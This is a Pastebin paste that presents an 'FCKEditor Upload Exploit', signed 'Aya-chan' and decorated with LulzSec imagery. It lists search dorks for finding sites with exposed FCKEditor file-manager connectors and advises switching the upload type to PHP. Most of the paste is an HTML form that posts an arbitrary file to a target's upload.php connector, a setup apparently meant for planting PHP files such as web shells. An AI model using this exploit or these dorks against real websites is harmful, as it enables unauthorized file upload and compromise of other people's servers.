Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- FCKEditor exploit ~Aya-chan
- Dork:
- inurl:/uploadtest.html
- inurl:/fckeditor/editor/filemanager/browser/default/connectors/
- Change upload type into: PHP
- enctype="text/plain"
- HTML sample form exploit:
- -----------------------------------------------------------------------------------------------------------
- <!--
- Removing my name doesn't mean you discover/created this. ~ Aya-chan
- -->
- <head>
- <title>FCKEditor Upload Exploit</title>
- <style>
- body {
- background-image: url('http://boingboing.net/images/lulzsecp.jpg');
- background-repeat: no-repeat;
- background-size:cover;
- }
- </style>
- </head>
- <body bgColor="black">
- <br/><br/>
- <center>
- <img src="https://upload.wikimedia.org/wikipedia/en/thumb/7/7c/Lulz_Security.svg/903px-Lulz_Security.svg.png" width="300" alt="LulzSec"/><br/>
- <font color="black" size="+2" face="impact"> Fckeditor Upload Exploit [<font color="yellow" size="+2" face="impact">~Aya-chan</font>] </font>
- <form enctype="multipart/form-data" action="http://siteadi/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">
- <input style="font-color: white; font-face: verdana; font-size: 20px; background-color: gray;" name="NewFile" type="file"></input>
- <input style="font-color: white; font-face: verdana; font-size: 20px; background-color: blue;" type="submit" value="Upload"></input>
- </form>
- </center>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement